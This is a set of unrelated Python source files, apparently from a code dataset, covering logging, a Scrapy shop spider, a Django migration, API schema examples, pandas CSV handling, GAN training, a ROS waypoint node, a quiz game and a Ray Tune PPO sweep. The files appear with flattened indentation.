for row in rows:
csvWriter.writerow(row)
def insert_bd():
"""if request.method=='POST':
# Handle POST Request here
return render_template('index.html')
sql= "INSERT into autor values (0,'Andres1','Algo1 xd');"
conn=mysql.connect()
cursor=conn.cursor()
cursor.execute(sql)
conn.commit()"""
if __name__ == '__main__':
#DEBUG is SET to TRUE. CHANGE FOR PROD
app.run(port=5000,debug=True)
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
|
StarcoderdataPython
|
6535810
|
<gh_stars>100-1000
#!/usr/bin/env python
"""
A simple logging module that logs to the console and a logfile, and has a
configurable threshold loglevel for each of console and logfile output.
Use it this way:
import anuga.utilities.log as log
# configure my logging
log.console_logging_level = log.INFO
log.log_logging_level = log.DEBUG
log.log_filename = './my.log'
# log away!
log.debug('A message at DEBUG level')
log.info('Another message, INFO level')
This class uses the 'borg' pattern - there is never more than one instance
of log data. See the URL for the basic idea used here: modules *are*
singletons!
<http://www.suttoncourtenay.org.uk/duncan/accu/pythonpatterns.html>
Until the first call to log() the user is free to play with the module data
to configure the logging.
"""
import os
import sys
import traceback
import logging
import datetime
DefaultConsoleLogLevel = logging.CRITICAL
DefaultFileLogLevel = logging.INFO
TimingDelimiter ='#@# '
################################################################################
# Module variables - only one copy of these, ever.
#
# The console logging level is set to a high level, like CRITICAL. The logfile
# logging is set lower, between DEBUG and CRITICAL. The idea is to log least to
# the console, but ensure that everything that goes to the console *will* also
# appear in the log file. There is code to ensure log <= console levels.
#
# If console logging level is set to CRITICAL+1 then nothing will print on the
# console.
################################################################################
# flag variable to determine if logging set up or not
_setup = False
# logging level for the console
console_logging_level = DefaultConsoleLogLevel
# logging level for the logfile
log_logging_level = DefaultFileLogLevel
# The default name of the file to log to.
log_filename = os.path.join('.', 'anuga.log')
# set module variables so users don't have to do 'import logging'.
CRITICAL = logging.CRITICAL
ERROR = logging.ERROR
WARNING = logging.WARNING
INFO = logging.INFO
DEBUG = logging.DEBUG
NOTSET = logging.NOTSET
# set _new_python to True if python version 2.5 or later
_new_python = (sys.version_info[0]*10 + sys.version_info[1] >= 25) # 2.5.x.x
################################################################################
# Module code.
################################################################################
def log(msg, level=None):
'''Log a message at a particular loglevel.
msg: The message string to log.
level: The logging level to log with (defaults to console level).
The first call to this method (by anybody) initializes logging and
then logs the message. Subsequent calls just log the message.
'''
global _setup, log_logging_level
fname = '' # default to no frame name if it cannot be found
lnum = 0
# have we been setup?
if not _setup:
# sanity check the logging levels, require console >= file
if log_logging_level > console_logging_level:
log_logging_level = console_logging_level
# setup the file logging system
if _new_python:
fmt = '%(asctime)s %(levelname)-8s %(mname)25s:%(lnum)-4d|%(message)s'
else:
fmt = '%(asctime)s %(levelname)-8s|%(message)s'
logging.basicConfig(level=log_logging_level, format=fmt,
filename=log_filename, filemode='w')
# define a console handler which writes to sys.stdout
console = logging.StreamHandler(sys.stdout)
console.setLevel(console_logging_level)
formatter = logging.Formatter('%(message)s')
console.setFormatter(formatter)
logging.getLogger('').addHandler(console)
# catch exceptions
sys.excepthook = log_exception_hook
# tell the world how we are set up
start_msg = ("Logfile is '%s' with logging level of %s, "
"console logging level is %s"
% (log_filename,
logging.getLevelName(log_logging_level),
logging.getLevelName(console_logging_level)))
if _new_python:
logging.log(logging.INFO, start_msg,
extra={'mname': __name__, 'lnum': 0})
else:
logging.log(logging.INFO, start_msg)
# mark module as *setup*
_setup = True
# if logging level not supplied, assume console level
if level is None:
level = console_logging_level
# get caller information - look back for first module != <this module name>
frames = traceback.extract_stack()
frames.reverse()
try:
(_, mod_name) = __name__.rsplit('.', 1)
except ValueError:
mod_name = __name__
for (fpath, lnum, mname, _) in frames:
try:
(fname, _) = os.path.basename(fpath).rsplit('.', 1)
except ValueError:
fname = __name__
if fname != mod_name:
break
# why are we here? ... Oh yes! Log the message!
if _new_python:
logging.log(level, msg, extra={'mname': fname, 'lnum': lnum})
else:
logging.log(level, msg)
def log_exception_hook(type, value, tb):
'''Hook function to process uncaught exceptions.
type: Type of exception.
value: The exception data.
tb: Traceback object.
This has the same interface as sys.excepthook().
'''
msg = '\n' + ''.join(traceback.format_exception(type, value, tb))
critical(msg)
################################################################################
# Shortcut routines to make for simpler user code.
################################################################################
def debug(msg=''):
'''Shortcut for log(DEBUG, msg).'''
log(msg, logging.DEBUG)
def info(msg=''):
'''Shortcut for log(INFO, msg).'''
log(msg, logging.INFO)
def warning(msg=''):
'''Shortcut for log(WARNING, msg).'''
log(msg, logging.WARNING)
def error(msg=''):
'''Shortcut for log(ERROR, msg).'''
log(msg, logging.ERROR)
def critical(msg=''):
'''Shortcut for log(CRITICAL, msg).'''
log(msg, logging.CRITICAL)
def timingInfo(msg=''):
'''Shortcut for log(timingDelimiter, msg).'''
log(TimingDelimiter + msg, logging.INFO)
def resource_usage(level=logging.INFO):
'''Log memory usage at given log level.'''
_scale = {'KB': 1024, 'MB': 1024*1024, 'GB': 1024*1024*1024,
'kB': 1024, 'mB': 1024*1024, 'gB': 1024*1024*1024}
if sys.platform != 'win32':
_proc_status = '/proc/%d/status' % os.getpid()
def _VmB(VmKey):
'''Get number of virtual bytes used.'''
# get pseudo file /proc/<pid>/status
try:
t = open(_proc_status)
v = t.read()
t.close()
except IOError:
return 0.0
# get VmKey line, eg: 'VmRSS: 999 kB\n ...
i = v.index(VmKey)
v = v[i:].split(None, 3)
if len(v) < 3:
return 0.0
# convert Vm value to bytes
return float(v[1]) * _scale[v[2]]
def memory(since=0.0):
'''Get virtual memory usage in bytes.'''
return _VmB('VmSize:') - since
def resident(since=0.0):
'''Get resident memory usage in bytes.'''
return _VmB('VmRSS:') - since
def stacksize(since=0.0):
'''Get stack size in bytes.'''
return _VmB('VmStk:') - since
msg = ('Resource usage: memory=%.1fMB resident=%.1fMB stacksize=%.1fMB'
% ((memory() / _scale['MB']),
(resident() / _scale['MB']),
(stacksize() / _scale['MB'])))
log(msg, level)
else:
# Windows code from: http://code.activestate.com/recipes/511491/
try:
import ctypes
import winreg
except:
            log('Windows resource usage not available', level)
return
kernel32 = ctypes.windll.kernel32
c_ulong = ctypes.c_ulong
c_ulonglong = ctypes.c_ulonglong
class MEMORYSTATUSEX(ctypes.Structure):
_fields_ = [('dwLength', c_ulong),
('dwMemoryLoad', c_ulong),
('ullTotalPhys', c_ulonglong),
('ullAvailPhys', c_ulonglong),
('ullTotalPageFile', c_ulonglong),
('ullAvailPageFile', c_ulonglong),
('ullTotalVirtual', c_ulonglong),
('ullAvailVirtual', c_ulonglong),
('ullAvailExtendedVirtual', c_ulonglong)
]
memoryStatusEx = MEMORYSTATUSEX()
memoryStatusEx.dwLength = ctypes.sizeof(MEMORYSTATUSEX)
kernel32.GlobalMemoryStatusEx(ctypes.byref(memoryStatusEx))
msg = ('Resource usage: total memory=%.1fMB free memory=%.1fMB'
% ((memoryStatusEx.ullTotalPhys / _scale['MB']),
(memoryStatusEx.ullAvailPhys / _scale['MB'])))
log(msg, level)
def CurrentDateTime():
return datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
def TimeStamp():
return datetime.datetime.now().strftime('%Y%m%d_%H%M%S')
def resource_usage_timing(level=logging.INFO, prefix =""):
'''Log memory usage at given log level.'''
_scale = {'KB': 1024, 'MB': 1024*1024, 'GB': 1024*1024*1024,
'kB': 1024, 'mB': 1024*1024, 'gB': 1024*1024*1024}
if sys.platform != 'win32':
_proc_status = '/proc/%d/status' % os.getpid()
def _VmB(VmKey):
'''Get number of virtual bytes used.'''
# get pseudo file /proc/<pid>/status
try:
t = open(_proc_status)
v = t.read()
t.close()
except IOError:
return 0.0
# get VmKey line, eg: 'VmRSS: 999 kB\n ...
i = v.index(VmKey)
v = v[i:].split(None, 3)
if len(v) < 3:
return 0.0
# convert Vm value to bytes
return float(v[1]) * _scale[v[2]]
def memory(since=0.0):
'''Get virtual memory usage in bytes.'''
return _VmB('VmSize:') - since
def resident(since=0.0):
'''Get resident memory usage in bytes.'''
return _VmB('VmRSS:') - since
def stacksize(since=0.0):
'''Get stack size in bytes.'''
return _VmB('VmStk:') - since
msg = ('Resource usage: memory=%.1fMB resident=%.1fMB stacksize=%.1fMB'
% ((memory() / _scale['MB']),
(resident() / _scale['MB']),
(stacksize() / _scale['MB'])))
log(msg, level)
timingInfo('sys_platform, ' + sys.platform)
timingInfo(prefix + 'memory, ' + str((memory() / _scale['MB'])))
timingInfo(prefix + 'resident, ' + str((resident() / _scale['MB'])))
timingInfo(prefix + 'stacksize, ' + str((stacksize() / _scale['MB'])))
else:
# Windows code from: http://code.activestate.com/recipes/511491/
try:
import ctypes
import winreg
except:
            log('Windows resource usage not available', level)
return
kernel32 = ctypes.windll.kernel32
c_ulong = ctypes.c_ulong
c_ulonglong = ctypes.c_ulonglong
class MEMORYSTATUSEX(ctypes.Structure):
_fields_ = [('dwLength', c_ulong),
('dwMemoryLoad', c_ulong),
('ullTotalPhys', c_ulonglong),
('ullAvailPhys', c_ulonglong),
('ullTotalPageFile', c_ulonglong),
('ullAvailPageFile', c_ulonglong),
('ullTotalVirtual', c_ulonglong),
('ullAvailVirtual', c_ulonglong),
('ullAvailExtendedVirtual', c_ulonglong)
]
memoryStatusEx = MEMORYSTATUSEX()
memoryStatusEx.dwLength = ctypes.sizeof(MEMORYSTATUSEX)
kernel32.GlobalMemoryStatusEx(ctypes.byref(memoryStatusEx))
msg = ('Resource usage: total memory=%.1fMB free memory=%.1fMB'
% ((memoryStatusEx.ullTotalPhys / _scale['MB']),
(memoryStatusEx.ullAvailPhys / _scale['MB'])))
log(msg, level)
timingInfo('sys_platform, ' + sys.platform)
timingInfo(prefix + 'total_memory, ' + str((memoryStatusEx.ullTotalPhys / _scale['MB'])))
timingInfo(prefix + 'free_memory, ' + str((memoryStatusEx.ullAvailPhys / _scale['MB'])))
################################################################################
if __name__ == '__main__':
critical('#' * 80)
warning('Test of logging...')
log('CRITICAL+1', CRITICAL+1)
log('CRITICAL', CRITICAL)
log('CRITICAL-1', CRITICAL-1)
log('CRITICAL-2', CRITICAL-2)
log('default - CRITICAL?')
def test_it(num=100):
if num > 0:
test_it(num-1)
else:
resource_usage()
import numpy as num
    a = num.zeros((1000, 1000), float)
info('sys.version_info=%s, _new_python=%s'
% (str(sys.version_info), str(_new_python)))
test_it()
|
StarcoderdataPython
|
1906767
|
# coding=utf-8
import datetime
import logging
import scrapy
from shop.items import ShopItem
logger = logging.getLogger('mycustomlogger')
class Megadrop24Spider(scrapy.Spider):
name = 'megadrop24.ru'
base_url = 'https://megadrop24.ru'
search = '/search/page%d?query=%s&minprice=1&maxprice=20000&submit='
def __init__(self, *args, **kwargs):
super(Megadrop24Spider, self).__init__(**kwargs)
self.query=kwargs['query']
self.history=kwargs['history']
def start_requests(self):
yield scrapy.Request(url=self.base_url + self.search % (1, self.query), callback=self.get_pages)
def get_pages(self, response):
print("user-agent: %s" % self.settings.get('USER_AGENT'))
count_pages = response.xpath('string(.//*[@class="pagination"]/li[last()])').extract_first()
if count_pages != '':
count_pages = int(count_pages)
else:
count_pages = 0
for page in range(count_pages + 1):
url = self.base_url + self.search % (page, self.query)
yield response.follow(url, callback=self.parse)
def parse(self, response):
for product in response.xpath('//*[@class="product-item"]'):
item = ShopItem()
item['resource'] = self.name
item['history'] = self.history
item["url"] = self.base_url + product.xpath('.//h3/a/@href').extract_first()
item["name"] = product.xpath('.//h3/a/text()').extract_first()
item["price"] = float(product.xpath('.//*[@class="pi-price"]/text()').extract_first())
item['created_date'] = datetime.datetime.now()
yield item
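# --- Hedged usage note (assumption; not part of the original spider) ---
# The constructor expects 'query' and 'history' to be passed as spider arguments, e.g.:
#   scrapy crawl megadrop24.ru -a query=iphone -a history=1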
|
StarcoderdataPython
|
150294
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.29 on 2021-01-07 00:36
# IMPORTANT: This file was renamed on purpose to keep the same naming as release/python3, TODO: Check conflicts
from __future__ import unicode_literals
import django.core.files.storage
from django.db import migrations, models
import djangoplicity.contacts.models
class Migration(migrations.Migration):
dependencies = [
('contacts', '0008_auto_20190926_1400'),
]
operations = [
migrations.AlterField(
model_name='import',
name='data_file',
field=models.FileField(storage=django.core.files.storage.FileSystemStorage(base_url=None, location=b'/home/noirlabadmin/shared/contacts_import'), upload_to=djangoplicity.contacts.models.handle_uploaded_file),
),
]
|
StarcoderdataPython
|
1854797
|
<reponame>ThePokerFaCcCe/myblog
from drf_spectacular.utils import OpenApiExample, OpenApiParameter
from rest_framework import serializers
from core.schema_helper import (schema_generator,
RESPONSE_DEFAULT_RETRIEVE,
PAGINATION_DEFAULT, RESPONSE_DEFAULT_PAGINATED)
from social.schemas import TAG_RESPONSE_RETRIEVE
from picturic.schemas import PICTURE_DEFAULT
USER_EDIT_REQUEST = OpenApiExample(
name='User',
request_only=True,
value=schema_generator({
"first_name": str,
"last_name": str,
"birth_date": "date",
})
)
USER_STAFF_EDIT_REQUEST = OpenApiExample(
name='Staff User',
request_only=True,
value={
**USER_EDIT_REQUEST.value,
**schema_generator({
'email': 'email',
'is_active': bool,
'is_vip': bool,
'is_author': bool,
'rank_expire_date': "datetime",
})
}
)
USER_SUPER_EDIT_REQUEST = OpenApiExample(
name='Super User',
request_only=True,
value={
**USER_EDIT_REQUEST.value,
**USER_STAFF_EDIT_REQUEST.value,
**schema_generator({
'is_staff': bool,
'is_superuser': bool,
})
}
)
class RUDParametersSerializer(serializers.Serializer):
id = serializers.IntegerField(min_value=0, required=False, allow_null=True)
slug = serializers.SlugField(allow_unicode=True, required=False, allow_null=True)
rud_parameters = OpenApiParameter('Get Item', description='Enter either `id` or `slug` for finding item', type=RUDParametersSerializer)
CATEGORY_INFO_DEFAULT = {
"id": int,
"title": str,
"slug": str,
"special_for": "V",
}
POST_RESPONSE_RETRIEVE = OpenApiExample(
**RESPONSE_DEFAULT_RETRIEVE,
value=schema_generator({
"id": int,
"title": str,
"slug": str,
"special_for": "V",
"category": CATEGORY_INFO_DEFAULT,
"picture": PICTURE_DEFAULT,
"content": str,
"author": int,
"tags": [TAG_RESPONSE_RETRIEVE.value],
"likes": int,
"dislikes": int,
"liked_by_user": bool,
"created_at": "datetime",
"updated_at": "datetime"
})
)
POST_RESPONSE_PAGINATED = OpenApiExample(
**RESPONSE_DEFAULT_PAGINATED,
value={
**PAGINATION_DEFAULT,
'results': [POST_RESPONSE_RETRIEVE.value]
}
)
|
StarcoderdataPython
|
3534509
|
#coding: utf-8
from pandas import Series, DataFrame
import pandas as pd
import numpy as np
import sys
df = pd.read_csv('ex1.csv')
print(df)
df_read_table = pd.read_table('ex1.csv', sep=',')
print(df_read_table)
nohead_csv = pd.read_csv('no_head_csv.csv', header=None)
print(nohead_csv)
nohead_csv = pd.read_csv(
'no_head_csv.csv', names=[
'a', 'b', 'c', 'd', 'message'])
print(nohead_csv)
names = ['a', 'b', 'c', 'd', 'message']
nohead_csv = pd.read_csv('no_head_csv.csv', names=names, index_col='message')
print(nohead_csv)
parsed = pd.read_csv('csv_mindex.csv', index_col=['key1', 'key2'])
print(parsed)
result = pd.read_csv('big_csv.csv', nrows=5)
print(result)
chunker = pd.read_csv('big_csv.csv', chunksize=500)
print(chunker)
tot = Series([], dtype='float64')
for piece in chunker:
tot = tot.add(piece['key'].value_counts(), fill_value=0)
tot = tot.sort_values(ascending=True)
print(tot)
data = pd.read_csv('ex1.csv')
print(data)
data.to_csv('out.csv')
data.to_csv(sys.stdout, sep='|')
print(data.to_csv('out2.csv', index=False, header=False))
dates = pd.date_range('1/1/2017', periods=7)
ts = Series(np.arange(7), dates)
print(ts)
ts.to_csv('tseries.csv')
|
StarcoderdataPython
|
1698723
|
<filename>plato/processors/compress.py
"""
Implements a Processor for compressing a numpy array.
"""
from typing import Any
import zstd
from plato.processors import base
class Processor(base.Processor):
""" Implements a Processor for compressing numpy array. """
def __init__(self, cr=1, **kwargs) -> None:
super().__init__(**kwargs)
self.compression_ratio = cr
def process(self, data: Any) -> Any:
""" Implements a Processor for compressing numpy array. """
if isinstance(data, list):
ret = []
datashape_feature = data[0][0].shape
datatype_feature = data[0][0].dtype
ret.append((datashape_feature, datatype_feature))
for logits, targets in data:
datashape_target = targets.shape
datatype_target = targets.dtype
datacom_feature = zstd.compress(logits, self.compression_ratio)
datacom_target = zstd.compress(targets, self.compression_ratio)
ret.append((datacom_feature, datacom_target, datashape_target,
datatype_target))
else:
ret = (data.shape, data.dtype,
zstd.compress(data, self.compression_ratio))
return ret
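# --- Hedged usage sketch (assumption; not part of the original module) ---
# A single array is returned as (shape, dtype, compressed_bytes); a list of
# (logits, targets) pairs is returned with a (shape, dtype) header element first.
#   processor = Processor(cr=3)
#   shape, dtype, payload = processor.process(some_numpy_array)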
|
StarcoderdataPython
|
4837174
|
<filename>simpleGame.py
# Simple game in python
import time
while True:#infinite loop
print('Hi, welcome to the Tim quiz!')
time.sleep(0.5)
print('Try to get as many questions correct as possible...')
time.sleep(0.5)
totalQuestions = 4
score = 0
ans = input('1. What is the name of my youtube channel? ')
if ans.lower() == 'tech with tim':
time.sleep(0.5)
print('Correct!')
score += 1
else:
time.sleep(0.5)
print('Incorrect')
time.sleep(0.5)
ans = input('2. What is my age? ')
if ans == "17":
time.sleep(0.5)
print('Correct!')
score += 1
elif ans == "seventeen":
time.sleep(0.5)
print('Correct!')
score += 1
elif ans.lower() == "seventeen":
time.sleep(0.5)
print('Correct!')
score += 1
else:
time.sleep(0.5)
print('Incorrect')
ans = input('3. What is my favourite sport? ')
if ans.lower() == "soccer":
time.sleep(0.5)
print('Correct!')
score += 1
elif ans.lower() == "football":
time.sleep(0.5)
print('Correct!')
score += 1
else:
time.sleep(0.5)
print('Incorrect')
ans = input('4. What is my favourite food? ')
if ans.lower() == "pizza":
time.sleep(0.5)
print('Correct!')
score += 1
else:
time.sleep(0.5)
print('Incorrect')
time.sleep(0.5)
print("Calculating score!")
time.sleep(0.5)
print("Thank you for playing!")
time.sleep(1)
countdown=5
for i in range(countdown):
print(countdown)
time.sleep(1)
countdown -= 1
percent = (score/totalQuestions) * 100
print("Mark: " + str(int(percent)) + '%')
if percent >= 50:
print('Nice! You passed!')
else:
print('Better luck next time')
print("If you want to quit, please press ctrl+c. If no, this game will run in an infinte loop")
time.sleep(3)
|
StarcoderdataPython
|
164441
|
<reponame>Rabbit1010/TensorFlow2.0-Tutorial-2019
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Dec 23 17:11:08 2019
@author: Wei-Hsiang, Shen
"""
import matplotlib.pyplot as plt
import tensorflow as tf
import time
from GAN_model import Generator_Model, Discriminator_Model
from data_generator import Get_DS
EPOCHS = 1000
BATCH_SIZE = 128 # this should be much smaller in generative models
train_ds, val_ds = Get_DS(BATCH_SIZE)
generator = Generator_Model()
discriminator = Discriminator_Model()
noise_dim = 200 # input shape of the generator
cross_entropy = tf.keras.losses.BinaryCrossentropy(from_logits=True)
def discriminator_loss(judgment_real, judgment_fake):
# judgement from real images should be close to 1
real_loss = cross_entropy(tf.ones_like(judgment_real), judgment_real)
# judgement from fake images should be close to 0
fake_loss = cross_entropy(tf.zeros_like(judgment_fake), judgment_fake)
# Total loss
total_loss = real_loss + fake_loss
return total_loss
def generator_loss(judgment_fake):
# generator wants the judgment of fake images to be close to 1
return cross_entropy(tf.ones_like(judgment_fake), judgment_fake)
# We will reuse this seed overtime (so it's easier) to visualize progress
num_examples_to_generate = 25
seed = tf.random.normal([num_examples_to_generate, noise_dim])
def generate_and_save_images(model, epoch, test_input):
# Notice `training` is set to False, so all layers run in inference mode (batchnorm).
predictions = model(test_input, training=False)
predictions = predictions.numpy()
predictions[predictions<0] = 0
predictions[predictions>1] = 1
fig = plt.figure(dpi=100, figsize=(16, 16))
for i in range(predictions.shape[0]):
plt.subplot(5, 5, i+1)
plt.imshow(predictions[i], vmin=0, vmax=1)
plt.axis('off')
plt.savefig('./results/test_image_at_epoch_{:04d}.png'.format(epoch))
plt.close(fig)
generator_optimizer = tf.keras.optimizers.RMSprop(1e-4)
discriminator_optimizer = tf.keras.optimizers.RMSprop(1e-4)
@tf.function
def train_step(batch):
noise = tf.random.normal([BATCH_SIZE, noise_dim])
# we want to have two tapes so that we can get two different gradients
with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:
# Notice `training` is set to True, so all layers run in training mode (batchnorm).
# Generator generates a batch of images from noise
generated_images = generator(noise, training=True)
# Discriminator takes in fake images from generator and true images from dataset
judgment_real = discriminator(batch, training=True)
judgment_fake = discriminator(generated_images, training=True)
# calculate the loss of both models
gen_loss = generator_loss(judgment_fake)
disc_loss = discriminator_loss(judgment_real, judgment_fake)
# Get their graident from loss to all variables
gradients_of_generator = gen_tape.gradient(gen_loss, generator.trainable_variables)
gradients_of_discriminator = disc_tape.gradient(disc_loss, discriminator.trainable_variables)
# Apply gradient descent using optimizer
generator_optimizer.apply_gradients(zip(gradients_of_generator, generator.trainable_variables))
discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, discriminator.trainable_variables))
return gen_loss, disc_loss
# Main training loop
for epoch in range(EPOCHS):
start_time = time.time()
gen_loss_total = 0
disc_loss_total = 0
i_step = 1
print("Epoch {}/{}".format(epoch+1, EPOCHS))
for batch in train_ds: # for each batch, note that we do not code batch per epoch, the dataset would end if all data is used
gen_loss, disc_loss = train_step(batch)
gen_loss_total += gen_loss
disc_loss_total += disc_loss
print("\rStep {}".format(i_step), end='')
i_step += 1
end_time = time.time()
print(', gen_loss: {:.3f}, disc_loss: {:.3f}, time: {:.2f} sec'.format(gen_loss_total, disc_loss_total, end_time-start_time))
if epoch%50 == 0: # save weights every 50 epochs
generator.save_weights('./checkpoints/generator_weights_{}.h5'.format(epoch))
# Save generated image at the end of each epoch
generate_and_save_images(generator, epoch + 1, seed)
|
StarcoderdataPython
|
349436
|
#!/usr/bin/env python
import rospy
import sys
import os
import math
import csv
from nav_msgs.msg import Odometry
from std_msgs.msg import Int64
from geometry_msgs.msg import PoseStamped
car_name = str(sys.argv[1])
pkg_path = str(sys.argv[2])
trajectory_name = str(sys.argv[3])
plan = []
min_index_pub = rospy.Publisher('/{}/purepursuit_control/index_nearest_point'.format(car_name), Int64, queue_size = 1)
min_pose_pub = rospy.Publisher('/{}/purepursuit_control/visualize_nearest_point'.format(car_name), PoseStamped, queue_size = 1)
def construct_path():
file_path = os.path.expanduser('{}/path/{}.csv'.format(pkg_path, trajectory_name))
with open(file_path) as csv_file:
csv_reader = csv.reader(csv_file, delimiter = ',')
for waypoint in csv_reader:
plan.append(waypoint)
for index in range(0, len(plan)):
for point in range(0, len(plan[index])):
plan[index][point] = float(plan[index][point])
def odom_callback(data):
min_index = Int64()
curr_x = data.pose.pose.position.x
curr_y = data.pose.pose.position.y
min_index.data = find_nearest_point(curr_x, curr_y)
min_index_pub.publish(min_index)
pose = PoseStamped()
pose.pose.position.x = plan[min_index.data][0]
pose.pose.position.y = plan[min_index.data][1]
min_pose_pub.publish(pose)
def find_nearest_point(curr_x, curr_y):
ranges = []
for index in range(0, len(plan)):
eucl_x = math.pow(curr_x - plan[index][0], 2)
eucl_y = math.pow(curr_y - plan[index][1], 2)
eucl_d = math.sqrt(eucl_x + eucl_y)
ranges.append(eucl_d)
return(ranges.index(min(ranges)))
if __name__ == '__main__':
try:
rospy.init_node('nearest_pose_isolator', anonymous = True)
if not plan:
rospy.loginfo('obtaining trajectory')
construct_path()
rospy.Subscriber('/{}/base/odom'.format(car_name), Odometry, odom_callback)
rospy.spin()
except rospy.ROSInterruptException:
pass
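# --- Hedged usage note (assumption; not part of the original node) ---
# The script expects three positional arguments: car name, package path and
# trajectory name (the .csv file under <pkg_path>/path/), e.g.:
#   rosrun <your_package> <this_script>.py car_1 /path/to/package raceline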
|
StarcoderdataPython
|
6593553
|
cont = cont2 = cont4 = cont5 = 0
cont3 = 16
times = ['Atlético-MG', 'Flamengo', 'Palmeiras', 'Fortaleza', 'Corinthians', 'Bragrantino', 'Fluminense', 'América-MG', 'Atlético-GO', 'Santos', 'Ceará', 'Internacional', 'São Paulo', 'Athletico-PR', 'Cuiabá', 'Juventude', 'Grêmio', 'Bahia', 'Sport', 'Chapecoense']
print('Tabela Brasileirão 2021:', end = ' ')
while True:
print(times[cont], end=', ')
cont += 1
if cont > 19:
print('')
break
print('=-' * 30)
print('G4:', end = ' ')
while True:
print(times[cont2], end=', ')
cont2 += 1
if cont2 > 3:
print('')
break
print('=-' * 30)
print('Z4:', end = ' ')
while True:
print(times[cont3], end=', ')
cont3 += 1
if cont3 > 19:
print('')
break
print('=-' * 30)
print('Ordem álfabetica:', end = ' ')
while True:
if times[cont4] == 'Chapecoense':
chape_posicao = cont4 + 1
break
cont4 += 1
times.sort()
while True:
print(times[cont5], end=', ')
cont5 += 1
    if cont5 > 19:
print('')
break
print('=-' * 30)
print(f'A Chapecoense ficou na posição {chape_posicao}')
|
StarcoderdataPython
|
6533181
|
import os
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
def create_folder(location):
if not os.path.exists(location):
os.makedirs(location)
def get_session_config():
config = tf.ConfigProto(
allow_soft_placement=True,
log_device_placement=False
)
config.gpu_options.allow_growth = True
config.gpu_options.per_process_gpu_memory_fraction = 1.0
return config
def get_checkpoint(checkpoint_dir, log=True):
ckpt = tf.train.get_checkpoint_state(checkpoint_dir)
if log:
tf.logging.info("loading tensorflow checkpoints...")
tf.logging.info('[+] Get checkpoint {}'.format(ckpt))
if ckpt and ckpt.model_checkpoint_path:
last_step = int(ckpt.model_checkpoint_path.split("-")[-1])
ckpt_path = ckpt.model_checkpoint_path
if log:
tf.logging.info("[+] RESTORE SAVED VARIBALES : restored {}".format(ckpt_path))
tf.logging.info("[+] RESTORE SAVED VARIBALES : restart from step {}".format(last_step))
else:
raise RuntimeError('checkpoint file was not found')
return ckpt_path, last_step
def get_batch_nums(batch_size, gpus):
q, r = divmod(batch_size, gpus)
return [q + 1] * r + [q] * (gpus - r)
def get_init_pretrained():
saver_reader = tf.train.Saver(
tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES)
)
init_fn = lambda sess, ckpt_path: saver_reader.restore(sess, ckpt_path)
return init_fn
# borrowed from https://github.com/lengstrom/fast-style-transfer/blob/master/src/utils.py
def get_files(img_dir):
imgs, masks, xmls = list_files(img_dir)
return list(map(lambda x: os.path.join(img_dir,x), imgs)),\
list(map(lambda x: os.path.join(img_dir,x), masks)),\
list(map(lambda x: os.path.join(img_dir,x), xmls))
def list_files(in_path):
img_files = []
mask_files = []
gt_files = []
for (dirpath, dirnames, filenames) in os.walk(in_path):
for file in filenames:
filename, ext = os.path.splitext(file)
ext = str.lower(ext)
if ext == '.jpg' or ext == '.jpeg' or ext == '.gif' or ext == '.png' or ext == '.pgm':
img_files.append(os.path.join(dirpath, file))
elif ext == '.bmp':
mask_files.append(os.path.join(dirpath, file))
elif ext == '.xml' or ext == '.gt' or ext == '.txt':
gt_files.append(os.path.join(dirpath, file))
elif ext == '.zip':
continue
else:
print ('There is no file : %s'%(file))
# img_files.sort()
# mask_files.sort()
# gt_files.sort()
return img_files, mask_files, gt_files
|
StarcoderdataPython
|
6514314
|
"""
Example of how to use the ray tune library to perform hyperparameter sweeps on
the Proximal Policy Optimization (PPO) algorithm.
"""
import argparse
from functools import partial
import numpy as np
import pandas as pd
from ray import tune
from ray.tune import Analysis, CLIReporter
from ray.tune.schedulers import ASHAScheduler
from ilpyt.agents.ppo_agent import PPOAgent
from ilpyt.algos.rl import RL
from ilpyt.utils.env_utils import build_env
from ilpyt.utils.net_utils import choose_net
from ilpyt.utils.seed_utils import set_seed
pd.set_option(
"display.max_rows",
None,
"display.max_columns",
None,
"display.max_colwidth",
None,
)
def train(
config,
env_id,
num_episodes,
num_env: int = 16,
use_gpu: bool = True,
seed: int = 24,
):
# Set random seed
set_seed(seed)
# Build environment
env = build_env(env_id=env_id, num_env=num_env, seed=seed)
# Build agent
agent = PPOAgent(
actor=choose_net(env, activation='tanh'),
critic=choose_net(env, activation='tanh', output_shape=1),
lr=config['lr'],
gamma=config['gamma'],
clip_ratio=config['clip_ratio'],
entropy_coeff=config['entropy_coeff'],
)
algo = RL(
env=env, agent=agent, use_gpu=use_gpu, save_path='.', load_path=''
)
algo.train(
num_episodes=num_episodes, rollout_steps=config['rollout_steps']
)
tune.report(reward=np.mean(algo.reward_tracker))
def hyperparameter_search(env, num_samples=100, max_num_epochs=5000):
config = {
"clip_ratio": tune.choice([0.1, 0.2, 0.3]),
"gamma": tune.choice([0.9, 0.99, 0.999]),
"lr": tune.choice([1e-5, 5e-5, 1e-4, 5e-4, 1e-3, 5e-3, 1e-2]),
"rollout_steps": tune.choice([8, 16, 32, 64]),
"entropy_coeff": tune.choice([1e-6, 1e-5, 1e-4, 1e-3, 1e-2, 1e-1]),
}
scheduler = ASHAScheduler(
metric="reward",
mode="max",
max_t=max_num_epochs,
grace_period=1,
reduction_factor=2,
)
reporter = CLIReporter(metric_columns=["reward", "training_iteration"])
result = tune.run(
partial(train, env_id=env, num_episodes=max_num_epochs),
name="PPO_%s" % env,
resources_per_trial={"cpu": 1, "gpu": 0.1},
config=config,
num_samples=num_samples,
scheduler=scheduler,
progress_reporter=reporter,
raise_on_failed_trial=False,
)
best_trial = result.get_best_trial("reward", "max", "last-5-avg")
print("Best trial config: {}".format(best_trial.config))
print("Best trial reward: {}".format(best_trial.last_result["reward"]))
def report_results(results_dir):
result = Analysis(results_dir)
trials = result.dataframe("reward", "max")
top_trials = trials.sort_values(by=['reward']).tail(5)
selected_columns = [col for col in top_trials.columns if 'config' in col]
selected_columns += ['reward', 'done', 'logdir']
print(top_trials[selected_columns])
top_trials[selected_columns].to_csv('results.csv')
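# e.g. report_results('ray_results/PPO_LunarLanderContinuous-v2')  # hypothetical Ray Tune results directory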
